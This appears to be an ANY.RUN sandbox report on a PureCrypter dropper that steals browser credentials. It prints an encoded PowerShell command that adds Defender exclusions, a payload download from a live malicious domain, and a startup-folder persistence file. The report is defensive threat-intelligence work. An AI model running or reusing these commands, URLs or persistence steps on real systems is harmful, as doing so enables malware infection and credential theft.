File name:

SecuriteInfo.com.Win32.DropperX-gen.15208.15730

Full analysis: https://app.any.run/tasks/9507e790-e663-4fb5-9246-6e50e58c7146
Verdict: Malicious activity
Threats:

First identified in March 2021, PureCrypter is a .NET-based loader that employs obfuscation techniques, such as SmartAssembly, to evade detection. It has been used to distribute malware families including AgentTesla, RedLine Stealer, and SnakeKeylogger. The malware is typically delivered through phishing campaigns and malicious downloads, often masquerading as legitimate files with extensions like .mp4 or .pdf. PureCrypter utilizes encryption and compression to conceal its payloads and can inject malicious code into legitimate processes to maintain persistence on the infected system.

Analysis date: March 24, 2025, 14:06:41
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
opendir
purecrypter
netreactor
stealer
ultravnc
rmm-tool
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
MD5:

DD7B6FD6949A1B826CC751727FFB8986

SHA1:

BD463A05B56581B3657DFC3E2BCA7DFB07055E51

SHA256:

3A8FE7C40AC9C7F78271EC895E3074ABFB30C5FD3D802D7107DE2E9D13B3CABB

SSDEEP:

1536:vh1hGvnBdl/weHMYiyyyyyyLJyNwWyy48NhusElNh:vZGvnBdlY5EyZJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executing a file with an untrusted certificate

      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7300)
      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7708)
    • Steals credentials from Web Browsers

      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7708)
    • PURECRYPTER has been detected (YARA)

      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7300)
    • Actions looks like stealing of personal data

      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7708)
  • SUSPICIOUS

    • Process uses IPCONFIG to discard the IP address configuration

      • cmd.exe (PID: 7228)
    • Process uses IPCONFIG to renew DHCP configuration

      • cmd.exe (PID: 7644)
    • Starts POWERSHELL.EXE for commands execution

      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7300)
    • Base64-obfuscated command line is found

      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7300)
    • Starts CMD.EXE for commands execution

      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7300)
    • BASE64 encoded PowerShell command has been detected

      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7300)
    • Executable content was dropped or overwritten

      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7300)
    • Connects to SMTP port

      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7708)
  • INFO

    • Checks proxy server information

      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7300)
    • Disables trace logs

      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7300)
    • Process checks computer location settings

      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7300)
    • Checks supported languages

      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7300)
      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7708)
    • Reads the computer name

      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7300)
      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7708)
    • Reads the machine GUID from the registry

      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7300)
    • .NET Reactor protector has been detected

      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7300)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 4608)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4608)
    • Manual execution by a user

      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7708)
    • ULTRAVNC has been detected

      • SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe (PID: 7708)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.dll | Win32 Dynamic Link Library (generic) (43.5)
.exe | Win32 Executable (generic) (29.8)
.exe | Generic Win/DOS Executable (13.2)
.exe | DOS Executable Generic (13.2)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:03:24 04:43:47+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 8
CodeSize: 4096
InitializedDataSize: 180224
UninitializedDataSize: -
EntryPoint: 0x2e9e
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 1.0.0.0
ProductVersionNumber: 1.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
Comments: -
CompanyName: -
FileDescription: Smrht
FileVersion: 1.0.0.0
InternalName: Smrht.exe
LegalCopyright: Copyright © 2017
LegalTrademarks: -
OriginalFileName: Smrht.exe
ProductName: Smrht
ProductVersion: 1.0.0.0
AssemblyVersion: 1.0.0.0
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
153
Monitored processes
13
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start #PURECRYPTER securiteinfo.com.win32.dropperx-gen.15208.15730.exe sppextcomobj.exe no specs slui.exe cmd.exe no specs conhost.exe no specs ipconfig.exe no specs powershell.exe conhost.exe no specs securiteinfo.com.win32.dropperx-gen.15208.15730.exe cmd.exe no specs conhost.exe no specs ipconfig.exe no specs slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
4244\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4608"C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAUwBlAGMAdQByAGkAdABlAEkAbgBmAG8ALgBjAG8AbQAuAFcAaQBuADMAMgAuAEQAcgBvAHAAcABlAHIAWAAtAGcAZQBuAC4AMQA1ADIAMAA4AC4AMQA1ADcAMwAwAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABhAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAFMAZQBjAHUAcgBpAHQAZQBJAG4AZgBvAC4AYwBvAG0ALgBXAGkAbgAzADIALgBEAHIAbwBwAHAAZQByAFgALQBnAGUAbgAuADEANQAyADAAOAAuADEANQA3ADMAMAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAaQBjAG8AbgAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABpAGMAbwBuAC4AZQB4AGUAC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
5736\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7228"C:\Windows\System32\cmd.exe" /c ipconfig /releaseC:\Windows\SysWOW64\cmd.exeSecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
7288ipconfig /releaseC:\Windows\SysWOW64\ipconfig.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
IP Configuration Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\ipconfig.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
7300"C:\Users\admin\AppData\Local\Temp\SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe" C:\Users\admin\AppData\Local\Temp\SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Smrht
Exit code:
4294967295
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\temp\securiteinfo.com.win32.dropperx-gen.15208.15730.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
7456C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
7500"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7644"C:\Windows\System32\cmd.exe" /c ipconfig /renewC:\Windows\SysWOW64\cmd.exeSecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
7708"C:\Users\admin\AppData\Local\Temp\SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe"C:\Users\admin\AppData\Local\Temp\SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Smrht
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\temp\securiteinfo.com.win32.dropperx-gen.15208.15730.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
Total events
7 994
Read events
7 980
Write events
14
Delete events
0

Modification events

(PID) Process:(7300) SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7300) SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7300) SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(7300) SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(7300) SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(7300) SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(7300) SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(7300) SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7300) SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7300) SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
1
Suspicious files
1
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
4608powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:C26E61C123F6552EAE0A6C2A65874B02
SHA256:5E30594B9B8EC2DEDB723C881AAA8BDFED052181262FE6E252F81BEFE61B05A0
4608powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0qndndus.ptg.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4608powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_f4umq3kp.gea.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4608powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ahmd2rqk.03i.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7300SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exeC:\Users\admin\AppData\Roaming\icon.exeexecutable
MD5:DD7B6FD6949A1B826CC751727FFB8986
SHA256:3A8FE7C40AC9C7F78271EC895E3074ABFB30C5FD3D802D7107DE2E9D13B3CABB
4608powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_o1u0vxrt.ua2.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7300SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\icon.vbstext
MD5:5DD7A1D1CCE83A9032FFB4EE03F569E3
SHA256:9DB8C6BE7E97893A0D25B4FF7BE5598711827817DB449A36DC8D92150C07910E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
30
DNS requests
20
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
7300
SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe
GET
200
185.253.218.211:80
http://hirosavva-cn.com/panel/uploads/Uhrqvplxvn.dat
unknown
unknown
7408
backgroundTaskHost.exe
GET
200
23.54.109.203:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
unknown
6544
svchost.exe
GET
200
23.54.109.203:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
unknown
5892
SIHClient.exe
GET
200
69.192.161.161:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
unknown
5892
SIHClient.exe
GET
200
69.192.161.161:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
unknown
7340
backgroundTaskHost.exe
GET
200
23.54.109.203:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4
System
192.168.100.255:137
unknown
4
System
192.168.100.255:138
unknown
5496
MoUsoCoreWorker.exe
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
unknown
7300
SecuriteInfo.com.Win32.DropperX-gen.15208.15730.exe
185.253.218.211:80
hirosavva-cn.com
NETH LLC
UA
unknown
3216
svchost.exe
40.113.103.199:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
6544
svchost.exe
20.190.159.73:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
6544
svchost.exe
23.54.109.203:80
ocsp.digicert.com
AKAMAI-AS
DE
unknown
5496
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
2104
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.78
unknown
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
unknown
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.166
  • 23.48.23.162
  • 23.48.23.173
  • 23.48.23.164
  • 23.48.23.177
  • 23.48.23.176
  • 23.48.23.183
  • 23.48.23.147
unknown
hirosavva-cn.com
  • 185.253.218.211
unknown
client.wns.windows.com
  • 40.113.103.199
unknown
login.live.com
  • 20.190.159.73
  • 20.190.159.131
  • 40.126.31.3
  • 40.126.31.2
  • 40.126.31.1
  • 40.126.31.71
  • 20.190.159.2
  • 20.190.159.128
unknown
ocsp.digicert.com
  • 23.54.109.203
unknown
arc.msn.com
  • 20.103.156.88
  • 20.223.35.26
unknown
slscr.update.microsoft.com
  • 20.12.23.50
unknown
www.microsoft.com
  • 69.192.161.161
unknown

Threats

No threats detected
No debug info